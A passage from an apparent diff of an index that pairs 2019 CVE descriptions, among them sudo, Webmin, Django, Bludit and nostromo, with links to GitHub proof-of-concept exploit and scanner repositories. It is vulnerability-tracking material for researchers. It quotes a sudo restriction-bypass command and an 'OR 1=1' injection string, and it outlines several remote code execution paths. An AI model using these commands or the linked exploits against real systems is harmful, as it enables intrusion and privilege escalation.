the dma buffer of a request which was never mapped in the first place leading to kernel failure in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8053, MDM9607, MDM9640, MSM8909W, MSM8953, QCA6574AU, QCS605, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX24, SM8150, SXR1130 + + +- [parallelbeings/CVE-2019-14079](https://github.com/parallelbeings/CVE-2019-14079) + +### CVE-2019-14220 (2019-09-24) + +An issue was discovered in BlueStacks 4.110 and below on macOS and on 4.120 and below on Windows. BlueStacks employs Android running in a virtual machine (VM) to enable Android apps to run on Windows or MacOS. Bug is in a local arbitrary file read through a system service call. The impacted method runs with System admin privilege and if given the file name as parameter returns you the content of file. A malicious app using the affected method can then read the content of any system file which it is not authorized to read + + +- [seqred-s-a/cve-2019-14220](https://github.com/seqred-s-a/cve-2019-14220) + +### CVE-2019-14234 (2019-08-09) + +An issue was discovered in Django 1.11.x before 1.11.23, 2.1.x before 2.1.11, and 2.2.x before 2.2.4. Due to an error in shallow key transformation, key and index lookups for django.contrib.postgres.fields.JSONField, and key lookups for django.contrib.postgres.fields.HStoreField, were subject to SQL injection. This could, for example, be exploited via crafted use of "OR 1=1" in a key or index name to return all records, using a suitably crafted dictionary, with dictionary expansion, as the **kwargs passed to the QuerySet.filter() function. + + +- [malvika-thakur/CVE-2019-14234](https://github.com/malvika-thakur/CVE-2019-14234) + +### CVE-2019-14267 (2019-07-29) + +PDFResurrect 0.15 has a buffer overflow via a crafted PDF file because data associated with startxref and %%EOF is mishandled. + + +- [snappyJack/pdfresurrect_CVE-2019-14267](https://github.com/snappyJack/pdfresurrect_CVE-2019-14267) + +### CVE-2019-14271 (2019-07-29) + +In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container. + + +- [iridium-soda/CVE-2019-14271_Exploit](https://github.com/iridium-soda/CVE-2019-14271_Exploit) + +### CVE-2019-14287 (2019-10-17) + +In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. + + +- [FauxFaux/sudo-cve-2019-14287](https://github.com/FauxFaux/sudo-cve-2019-14287) +- [CashWilliams/CVE-2019-14287-demo](https://github.com/CashWilliams/CVE-2019-14287-demo) +- [n0w4n/CVE-2019-14287](https://github.com/n0w4n/CVE-2019-14287) +- [gurneesh/CVE-2019-14287-write-up](https://github.com/gurneesh/CVE-2019-14287-write-up) +- [shallvhack/Sudo-Security-Bypass-CVE-2019-14287](https://github.com/shallvhack/Sudo-Security-Bypass-CVE-2019-14287) +- [huang919/cve-2019-14287-PPT](https://github.com/huang919/cve-2019-14287-PPT) +- [wenyu1999/sudo-](https://github.com/wenyu1999/sudo-) +- [Sindadziy/cve-2019-14287](https://github.com/Sindadziy/cve-2019-14287) +- [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271) +- [CMNatic/Dockerized-CVE-2019-14287](https://github.com/CMNatic/Dockerized-CVE-2019-14287) +- [axax002/sudo-vulnerability-CVE-2019-14287](https://github.com/axax002/sudo-vulnerability-CVE-2019-14287) +- [SachinthaDeSilva-cmd/Exploit-CVE-2019-14287](https://github.com/SachinthaDeSilva-cmd/Exploit-CVE-2019-14287) +- [HussyCool/CVE-2019-14287-IT18030372-](https://github.com/HussyCool/CVE-2019-14287-IT18030372-) +- [ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287](https://github.com/ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287) +- [ejlevin99/Sudo-Security-Bypass-Vulnerability](https://github.com/ejlevin99/Sudo-Security-Bypass-Vulnerability) +- [thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-](https://github.com/thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-) +- [janod313/-CVE-2019-14287-SUDO-bypass-vulnerability](https://github.com/janod313/-CVE-2019-14287-SUDO-bypass-vulnerability) +- [DewmiApsara/CVE-2019-14287](https://github.com/DewmiApsara/CVE-2019-14287) +- [M108Falcon/Sudo-CVE-2019-14287](https://github.com/M108Falcon/Sudo-CVE-2019-14287) +- [edsonjt81/CVE-2019-14287-](https://github.com/edsonjt81/CVE-2019-14287-) +- [DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights](https://github.com/DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights) +- [n3rdh4x0r/CVE-2019-14287](https://github.com/n3rdh4x0r/CVE-2019-14287) +- [Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287](https://github.com/Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287) +- [MariliaMeira/CVE-2019-14287](https://github.com/MariliaMeira/CVE-2019-14287) +- [Ijinleife/CVE-2019-14287](https://github.com/Ijinleife/CVE-2019-14287) +- [lemonadern/poc-cve-2019-14287](https://github.com/lemonadern/poc-cve-2019-14287) + +### CVE-2019-14314 (2019-08-27) + +A SQL injection vulnerability exists in the Imagely NextGEN Gallery plugin before 3.2.11 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via modules/nextgen_gallery_display/package.module.nextgen_gallery_display.php. + + +- [imthoe/CVE-2019-14314](https://github.com/imthoe/CVE-2019-14314) + +### CVE-2019-14319 (2019-09-04) + +The TikTok (formerly Musical.ly) application 12.2.0 for Android and iOS performs unencrypted transmission of images, videos, and likes. This allows an attacker to extract private sensitive information by sniffing network traffic. + + +- [MelroyB/CVE-2019-14319](https://github.com/MelroyB/CVE-2019-14319) + +### CVE-2019-14322 (2019-07-28) + +In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames. + + +- [faisalfs10x/CVE-2019-14322-scanner](https://github.com/faisalfs10x/CVE-2019-14322-scanner) +- [faisalfs10x/http-vuln-cve2019-14322.nse](https://github.com/faisalfs10x/http-vuln-cve2019-14322.nse) +- [sergiovks/CVE-2019-14322](https://github.com/sergiovks/CVE-2019-14322) + +### CVE-2019-14326 (2020-04-14) + +An issue was discovered in AndyOS Andy versions up to 46.11.113. By default, it starts telnet and ssh (ports 22 and 23) with root privileges in the emulated Android system. This can be exploited by remote attackers to gain full access to the device, or by malicious apps installed inside the emulator to perform privilege escalation from a normal user to root (unlike with standard methods of getting root privileges on Android - e.g., the SuperSu program - the user is not asked for consent). There is no authentication performed - access to a root shell is given upon a successful connection. NOTE: although this was originally published with a slightly different CVE ID number, the correct ID for this Andy vulnerability has always been CVE-2019-14326. + + +- [seqred-s-a/cve-2019-14326](https://github.com/seqred-s-a/cve-2019-14326) + +### CVE-2019-14339 (2019-09-05) + +The ContentProvider in the Canon PRINT jp.co.canon.bsd.ad.pixmaprint 2.5.5 application for Android does not properly restrict canon.ij.printer.capability.data data access. This allows an attacker's malicious application to obtain sensitive information including factory passwords for the administrator web interface and WPA2-PSK key. + + +- [0x48piraj/CVE-2019-14339](https://github.com/0x48piraj/CVE-2019-14339) + +### CVE-2019-14439 (2019-07-30) + +A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. + + +- [jas502n/CVE-2019-14439](https://github.com/jas502n/CVE-2019-14439) + +### CVE-2019-14450 (2019-10-28) + +A directory traversal vulnerability was discovered in RepetierServer.exe in Repetier-Server 0.8 through 0.91 that allows for the creation of a user controlled XML file at an unintended location. When this is combined with CVE-2019-14451, an attacker can upload an "external command" configuration as a printer configuration, and achieve remote code execution. After exploitation, loading of the external command configuration is dependent on a system reboot or service restart. + + +- [securifera/CVE-2019-14450](https://github.com/securifera/CVE-2019-14450) + +### CVE-2019-14514 (2020-02-10) + +An issue was discovered in Microvirt MEmu all versions prior to 7.0.2. A guest Android operating system inside the MEmu emulator contains a /system/bin/systemd binary that is run with root privileges on startup (this is unrelated to Red Hat's systemd init program, and is a closed-source proprietary tool that seems to be developed by Microvirt). This program opens TCP port 21509, presumably to receive installation-related commands from the host OS. Because everything after the installer:uninstall command is concatenated directly into a system() call, it is possible to execute arbitrary commands by supplying shell metacharacters. + + +- [seqred-s-a/cve-2019-14514](https://github.com/seqred-s-a/cve-2019-14514) + +### CVE-2019-14529 (2019-08-02) + +OpenEMR before 5.0.2 allows SQL Injection in interface/forms/eye_mag/save.php. + + +- [Wezery/CVE-2019-14529](https://github.com/Wezery/CVE-2019-14529) + +### CVE-2019-14530 (2019-08-13) + +An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. + + +- [Wezery/CVE-2019-14530](https://github.com/Wezery/CVE-2019-14530) +- [sec-it/exploit-CVE-2019-14530](https://github.com/sec-it/exploit-CVE-2019-14530) + +### CVE-2019-14537 (2019-08-07) + +YOURLS through 1.7.3 is affected by a type juggling vulnerability in the api component that can result in login bypass. + + +- [Wocanilo/CVE-2019-14537](https://github.com/Wocanilo/CVE-2019-14537) + +### CVE-2019-14540 (2019-09-15) + +A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. + + +- [LeadroyaL/cve-2019-14540-exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit) + +### CVE-2019-14615 (2020-01-17) + +Insufficient control flow in certain data structures for some Intel(R) Processors with Intel(R) Processor Graphics may allow an unauthenticated user to potentially enable information disclosure via local access. + + +- [HE-Wenjian/iGPU-Leak](https://github.com/HE-Wenjian/iGPU-Leak) + +### CVE-2019-14678 (2019-11-14) + +SAS XML Mapper 9.45 has an XML External Entity (XXE) vulnerability that can be leveraged by malicious attackers in multiple ways. Examples are Local File Reading, Out Of Band File Exfiltration, Server Side Request Forgery, and/or Potential Denial of Service attacks. This vulnerability also affects the XMLV2 LIBNAME engine when the AUTOMAP option is used. + + +- [mbadanoiu/CVE-2019-14678](https://github.com/mbadanoiu/CVE-2019-14678) + +### CVE-2019-14745 (2019-08-07) + +In radare2 before 3.7.0, a command injection vulnerability exists in bin_symbols() in libr/core/cbin.c. By using a crafted executable file, it's possible to execute arbitrary shell commands with the permissions of the victim. This vulnerability is due to improper handling of symbol names embedded in executables. + + +- [xooxo/CVE-2019-14745](https://github.com/xooxo/CVE-2019-14745) + +### CVE-2019-14751 (2019-08-22) + +NLTK Downloader before 3.4.5 is vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in an NLTK package (ZIP archive) that is mishandled during extraction. + + +- [mssalvatore/CVE-2019-14751_PoC](https://github.com/mssalvatore/CVE-2019-14751_PoC) + +### CVE-2019-14830 (2021-03-19) + +A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where the mobile launch endpoint contained an open redirect in some circumstances, which could result in a user's mobile access token being exposed. (Note: This does not affect sites with a forced URL scheme configured, mobile service disabled, or where the mobile app login method is "via the app"). + + +- [Fr3d-/moodle-token-stealer](https://github.com/Fr3d-/moodle-token-stealer) + +### CVE-2019-14900 (2020-07-06) + +A flaw was found in Hibernate ORM in versions before 5.3.18, 5.4.18 and 5.5.0.Beta1. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. + + +- [shanika04/hibernate-orm](https://github.com/shanika04/hibernate-orm) + +### CVE-2019-14912 (2019-09-20) + +An issue was discovered in PRiSE adAS 1.7.0. The OPENSSO module does not properly check the goto parameter, leading to an open redirect that leaks the session cookie. + + +- [Wocanilo/adaPwn](https://github.com/Wocanilo/adaPwn) + +### CVE-2019-14974 (2019-08-14) + +SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS. + + +- [conan-sudo/CVE-2019-14974-bypass](https://github.com/conan-sudo/CVE-2019-14974-bypass) + +### CVE-2019-15029 (2019-09-05) + +FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command. + + +- [mhaskar/CVE-2019-15029](https://github.com/mhaskar/CVE-2019-15029) + +### CVE-2019-15043 (2019-09-03) + +In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. + + +- [h0ffayyy/CVE-2019-15043](https://github.com/h0ffayyy/CVE-2019-15043) + +### CVE-2019-15053 (2019-08-14) + +The "HTML Include and replace macro" plugin before 1.5.0 for Confluence Server allows a bypass of the includeScripts=false XSS protection mechanism via vectors involving an IFRAME element. + + +- [l0nax/CVE-2019-15053](https://github.com/l0nax/CVE-2019-15053) + +### CVE-2019-15107 (2019-08-16) + +An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability. + + +- [jas502n/CVE-2019-15107](https://github.com/jas502n/CVE-2019-15107) +- [HACHp1/webmin_docker_and_exp](https://github.com/HACHp1/webmin_docker_and_exp) +- [ketlerd/CVE-2019-15107](https://github.com/ketlerd/CVE-2019-15107) +- [AdministratorGithub/CVE-2019-15107](https://github.com/AdministratorGithub/CVE-2019-15107) +- [Rayferrufino/Make-and-Break](https://github.com/Rayferrufino/Make-and-Break) +- [AleWong/WebminRCE-EXP-CVE-2019-15107-](https://github.com/AleWong/WebminRCE-EXP-CVE-2019-15107-) +- [ianxtianxt/CVE-2019-15107](https://github.com/ianxtianxt/CVE-2019-15107) +- [hannob/webminex](https://github.com/hannob/webminex) +- [ChakoMoonFish/webmin_CVE-2019-15107](https://github.com/ChakoMoonFish/webmin_CVE-2019-15107) +- [cdedmondson/Modified-CVE-2019-15107](https://github.com/cdedmondson/Modified-CVE-2019-15107) +- [ruthvikvegunta/CVE-2019-15107](https://github.com/ruthvikvegunta/CVE-2019-15107) +- [n0obit4/Webmin_1.890-POC](https://github.com/n0obit4/Webmin_1.890-POC) +- [squid22/Webmin_CVE-2019-15107](https://github.com/squid22/Webmin_CVE-2019-15107) +- [MuirlandOracle/CVE-2019-15107](https://github.com/MuirlandOracle/CVE-2019-15107) +- [diegojuan/CVE-2019-15107](https://github.com/diegojuan/CVE-2019-15107) +- [whokilleddb/CVE-2019-15107](https://github.com/whokilleddb/CVE-2019-15107) +- [darrenmartyn/CVE-2019-15107](https://github.com/darrenmartyn/CVE-2019-15107) +- [hacknotes/CVE-2019-15107-Exploit](https://github.com/hacknotes/CVE-2019-15107-Exploit) +- [CyberTuz/CVE-2019-15107_detection](https://github.com/CyberTuz/CVE-2019-15107_detection) +- [hadrian3689/webmin_1.920](https://github.com/hadrian3689/webmin_1.920) +- [f0rkr/CVE-2019-15107](https://github.com/f0rkr/CVE-2019-15107) +- [psw01/CVE-2019-15107_webminRCE](https://github.com/psw01/CVE-2019-15107_webminRCE) +- [TheAlpha19/MiniExploit](https://github.com/TheAlpha19/MiniExploit) +- [wenruoya/CVE-2019-15107](https://github.com/wenruoya/CVE-2019-15107) +- [g1vi/CVE-2019-15107](https://github.com/g1vi/CVE-2019-15107) +- [K3ysTr0K3R/CVE-2019-15107-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-15107-EXPLOIT) +- [gozn/detect-CVE-2019-15107-by-pyshark](https://github.com/gozn/detect-CVE-2019-15107-by-pyshark) +- [h4ck0rman/CVE-2019-15107](https://github.com/h4ck0rman/CVE-2019-15107) +- [olingo99/CVE-2019-15107](https://github.com/olingo99/CVE-2019-15107) +- [aamfrk/Webmin-CVE-2019-15107](https://github.com/aamfrk/Webmin-CVE-2019-15107) +- [0x4r2/Webmin-CVE-2019-15107](https://github.com/0x4r2/Webmin-CVE-2019-15107) +- [NasrallahBaadi/CVE-2019-15107](https://github.com/NasrallahBaadi/CVE-2019-15107) +- [grayorwhite/CVE-2019-15107](https://github.com/grayorwhite/CVE-2019-15107) + +### CVE-2019-15120 (2019-08-16) + +The Kunena extension before 5.1.14 for Joomla! allows XSS via BBCode. + + +- [h3llraiser/CVE-2019-15120](https://github.com/h3llraiser/CVE-2019-15120) + +### CVE-2019-15126 (2020-02-05) + +An issue was discovered on Broadcom Wi-Fi client devices. Specifically timed and handcrafted traffic can cause internal errors (related to state transitions) in a WLAN device that lead to improper layer 2 Wi-Fi encryption with a consequent possibility of information disclosure over the air for a discrete set of traffic, a different vulnerability than CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, and CVE-2019-9503. + + +- [0x13enny/kr00k](https://github.com/0x13enny/kr00k) +- [hexway/r00kie-kr00kie](https://github.com/hexway/r00kie-kr00kie) +- [akabe1/kr00ker](https://github.com/akabe1/kr00ker) + +### CVE-2019-15166 (2019-10-03) + +lmp_print_data_link_subobjs() in print-lmp.c in tcpdump before 4.9.3 lacks certain bounds checks. + + +- [Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166](https://github.com/Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166) + +### CVE-2019-15224 (2019-08-19) + +The rest-client gem 1.6.10 through 1.6.13 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. Versions <=1.6.9 and >=1.6.14 are unaffected. + + +- [chef-cft/inspec_cve_2019_15224](https://github.com/chef-cft/inspec_cve_2019_15224) + +### CVE-2019-15231 +- [wizardy0ga/THM-Source-CVE-2019-15231](https://github.com/wizardy0ga/THM-Source-CVE-2019-15231) + +### CVE-2019-15233 (2019-08-20) + +The Live:Text Box macro in the Old Street Live Input Macros app before 2.11 for Confluence has XSS, leading to theft of the Administrator Session Cookie. + + +- [l0nax/CVE-2019-15233](https://github.com/l0nax/CVE-2019-15233) + +### CVE-2019-15477 (2019-08-23) + +Jooby before 1.6.4 has XSS via the default error handler. + + +- [epicosy/jooby](https://github.com/epicosy/jooby) + +### CVE-2019-15511 (2019-11-21) + +An exploitable local privilege escalation vulnerability exists in the GalaxyClientService installed by GOG Galaxy. Due to Improper Access Control, an attacker can send unauthenticated local TCP packets to the service to gain SYSTEM privileges in Windows system where GOG Galaxy software is installed. All GOG Galaxy versions before 1.2.60 and all corresponding versions of GOG Galaxy 2.0 Beta are affected. + + +- [adenkiewicz/CVE-2019-15511](https://github.com/adenkiewicz/CVE-2019-15511) + +### CVE-2019-15514 (2019-08-23) + +The Privacy > Phone Number feature in the Telegram app 5.10 for Android and iOS provides an incorrect indication that the access level is Nobody, because attackers can find these numbers via the Group Info feature, e.g., by adding a significant fraction of a region's assigned phone numbers. + + +- [bibi1959/CVE-2019-15514](https://github.com/bibi1959/CVE-2019-15514) + +### CVE-2019-15588 (2019-11-01) + +There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (bypass CVE-2019-5475) that could allow an attacker a Remote Code Execution (RCE). All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability. + + +- [EXP-Docs/CVE-2019-15588](https://github.com/EXP-Docs/CVE-2019-15588) + +### CVE-2019-15605 (2020-02-07) + +HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when transfer-encoding is malformed + + +- [jlcarruda/node-poc-http-smuggling](https://github.com/jlcarruda/node-poc-http-smuggling) + +### CVE-2019-15642 (2019-08-26) + +rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + + +- [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) + +### CVE-2019-15813 (2019-09-04) + +Multiple file upload restriction bypass vulnerabilities in Sentrifugo 3.2 could allow authenticated users to execute arbitrary code via a webshell. + + +- [wolf1892/CVE-2019-15813](https://github.com/wolf1892/CVE-2019-15813) + +### CVE-2019-15846 (2019-09-06) + +Exim before 4.92.2 allows remote attackers to execute arbitrary code as root via a trailing backslash. + + +- [synacktiv/Exim-CVE-2019-15846](https://github.com/synacktiv/Exim-CVE-2019-15846) + +### CVE-2019-15858 (2019-09-03) + +admin/includes/class.import.snippet.php in the "Woody ad snippets" plugin before 2.2.5 for WordPress allows unauthenticated options import, as demonstrated by storing an XSS payload for remote code execution. + + +- [GeneralEG/CVE-2019-15858](https://github.com/GeneralEG/CVE-2019-15858) +- [orangmuda/CVE-2019-15858](https://github.com/orangmuda/CVE-2019-15858) + +### CVE-2019-15896 (2019-09-10) + +An issue was discovered in the LifterLMS plugin through 3.34.5 for WordPress. The upload_import function in the class.llms.admin.import.php script is prone to an unauthenticated options import vulnerability that could lead to privilege escalation (administrator account creation), website redirection, and stored XSS. + + +- [RandomRobbieBF/CVE-2019-15896](https://github.com/RandomRobbieBF/CVE-2019-15896) + +### CVE-2019-15972 (2019-11-26) + +A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates SQL values. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database. + + +- [FSecureLABS/Cisco-UCM-SQLi-Scripts](https://github.com/FSecureLABS/Cisco-UCM-SQLi-Scripts) + +### CVE-2019-16097 (2019-09-08) + +core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. + + +- [evilAdan0s/CVE-2019-16097](https://github.com/evilAdan0s/CVE-2019-16097) +- [rockmelodies/CVE-2019-16097-batch](https://github.com/rockmelodies/CVE-2019-16097-batch) +- [ianxtianxt/CVE-2019-16097](https://github.com/ianxtianxt/CVE-2019-16097) +- [dacade/cve-2019-16097](https://github.com/dacade/cve-2019-16097) +- [theLSA/harbor-give-me-admin](https://github.com/theLSA/harbor-give-me-admin) +- [luckybool1020/CVE-2019-16097](https://github.com/luckybool1020/CVE-2019-16097) + +### CVE-2019-16098 (2019-09-11) + +The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. + + +- [Barakat/CVE-2019-16098](https://github.com/Barakat/CVE-2019-16098) +- [0xDivyanshu-new/CVE-2019-16098](https://github.com/0xDivyanshu-new/CVE-2019-16098) +- [Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE](https://github.com/Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE) + +### CVE-2019-16113 (2019-09-08) + +Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname. + + +- [ynots0ups/CVE-2019-16113](https://github.com/ynots0ups/CVE-2019-16113) +- [cybervaca/CVE-2019-16113](https://github.com/cybervaca/CVE-2019-16113) +- [hg8/CVE-2019-16113-PoC](https://github.com/hg8/CVE-2019-16113-PoC) +- [Kenun99/CVE-2019-16113-Dockerfile](https://github.com/Kenun99/CVE-2019-16113-Dockerfile) +- [dldygnl/CVE-2019-16113](https://github.com/dldygnl/CVE-2019-16113) +- [0xConstant/CVE-2019-16113](https://github.com/0xConstant/CVE-2019-16113) +- [DXY0411/CVE-2019-16113](https://github.com/DXY0411/CVE-2019-16113) +- [0xConstant/CVE-2019-16113_](https://github.com/0xConstant/CVE-2019-16113_) +- [mind2hex/CVE-2019-16113](https://github.com/mind2hex/CVE-2019-16113) +- [tronghoang89/cve-2019-16113](https://github.com/tronghoang89/cve-2019-16113) + +### CVE-2019-16172 (2019-09-09) + +LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion. + + +- [TrixSec/CVE-2019-16172](https://github.com/TrixSec/CVE-2019-16172) + +### CVE-2019-16253 (2019-09-25) + +The Text-to-speech Engine (aka SamsungTTS) application before 3.0.02.7 and 3.0.00.101 for Android allows a local attacker to escalate privileges, e.g., to system privileges. The Samsung case ID is 101755. + + +- [k0mraid3/K0mraid3s-System-Shell-PREBUILT](https://github.com/k0mraid3/K0mraid3s-System-Shell-PREBUILT) + +### CVE-2019-16278 (2019-10-14) + +Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. + + +- [jas502n/CVE-2019-16278](https://github.com/jas502n/CVE-2019-16278) +- [imjdl/CVE-2019-16278-PoC](https://github.com/imjdl/CVE-2019-16278-PoC) +- [ianxtianxt/CVE-2019-16278](https://github.com/ianxtianxt/CVE-2019-16278) +- [darkerego/Nostromo_Python3](https://github.com/darkerego/Nostromo_Python3) +- [AnubisSec/CVE-2019-16278](https://github.com/AnubisSec/CVE-2019-16278) +- [aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE](https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE) +- [Kr0ff/cve-2019-16278](https://github.com/Kr0ff/cve-2019-16278) +- [NHPT/CVE-2019-16278](https://github.com/NHPT/CVE-2019-16278) +- [keshiba/cve-2019-16278](https://github.com/keshiba/cve-2019-16278) +- [n3rdh4x0r/CVE-2019-16278](https://github.com/n3rdh4x0r/CVE-2019-16278) +- [alexander-fernandes/CVE-2019-16278](https://github.com/alexander-fernandes/CVE-2019-16278) +- [FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE](https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE) +- [0xTabun/CVE-2019-16278](https://github.com/0xTabun/CVE-2019-16278) +- [cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE](https://github.com/cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE) + +### CVE-2019-16279 (2019-10-14) + +A memory error in the function SSL_accept in nostromo nhttpd through 1.9.6 allows an attacker to trigger a denial of service via a crafted HTTP request. + + +- [ianxtianxt/CVE-2019-16279](https://github.com/ianxtianxt/CVE-2019-16279) + +### CVE-2019-16374 (2020-08-13) + +Pega Platform 8.2.1 allows LDAP injection because a username can contain a * character and can be of unlimited length. An attacker can specify four characters of a username, followed by the * character, to bypass access control. + + +- [IAG0110/CVE-2019-16374](https://github.com/IAG0110/CVE-2019-16374) + +### CVE-2019-16394 (2019-09-17) + +SPIP before 3.1.11 and 3.2 before 3.2.5 provides different error messages from the password-reminder page depending on whether an e-mail address exists, which might help attackers to enumerate subscribers. + + +- [trungnd51/Silent_CVE_2019_16394](https://github.com/trungnd51/Silent_CVE_2019_16394) + +### CVE-2019-16405 (2019-11-21) + +Centreon Web before 2.8.30, 18.10.x before 18.10.8, 19.04.x before 19.04.5 and 19.10.x before 19.10.2 allows Remote Code Execution by an administrator who can modify Macro Expression location settings. CVE-2019-16405 and CVE-2019-17501 are similar to one another and may be the same. + + +- [TheCyberGeek/CVE-2019-16405.rb](https://github.com/TheCyberGeek/CVE-2019-16405.rb) + +### CVE-2019-16516 (2020-01-23) + +An issue was discovered in ConnectWise Control (formerly known as ScreenConnect) 19.3.25270.7185. There is a user enumeration vulnerability, allowing an unauthenticated attacker to determine with certainty if an account exists for a given username. + + +- [czz/ScreenConnect-UserEnum](https://github.com/czz/ScreenConnect-UserEnum) + +### CVE-2019-16662 (2019-10-28) + +An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. + + +- [mhaskar/CVE-2019-16662](https://github.com/mhaskar/CVE-2019-16662) + +### CVE-2019-16663 (2019-10-28) + +An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to search.crud.php because the catCommand parameter is passed to the exec function without filtering, which can lead to command execution. + + +- [mhaskar/CVE-2019-16663](https://github.com/mhaskar/CVE-2019-16663) + +### CVE-2019-16692 (2019-09-22) + +phpIPAM 1.4 allows SQL injection via the app/admin/custom-fields/filter-result.php table parameter when action=add is used. + + +- [kkirsche/CVE-2019-16692](https://github.com/kkirsche/CVE-2019-16692) + +### CVE-2019-16724 (2019-09-24) + +File Sharing Wizard 1.5.0 allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter, a similar issue to CVE-2010-2330 and CVE-2010-2331. + + +- [nanabingies/CVE-2019-16724](https://github.com/nanabingies/CVE-2019-16724) + +### CVE-2019-16746 (2019-09-24) + +An issue was discovered in net/wireless/nl80211.c in the Linux kernel through 5.2.17. It does not check the length of variable elements in a beacon head, leading to a buffer overflow. + + +- [uthrasri/CVE-2019-16746](https://github.com/uthrasri/CVE-2019-16746) + +### CVE-2019-16759 (2019-09-24) + +vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request. + + +- [M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit](https://github.com/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit) +- [r00tpgp/http-vuln-CVE-2019-16759](https://github.com/r00tpgp/http-vuln-CVE-2019-16759) +- 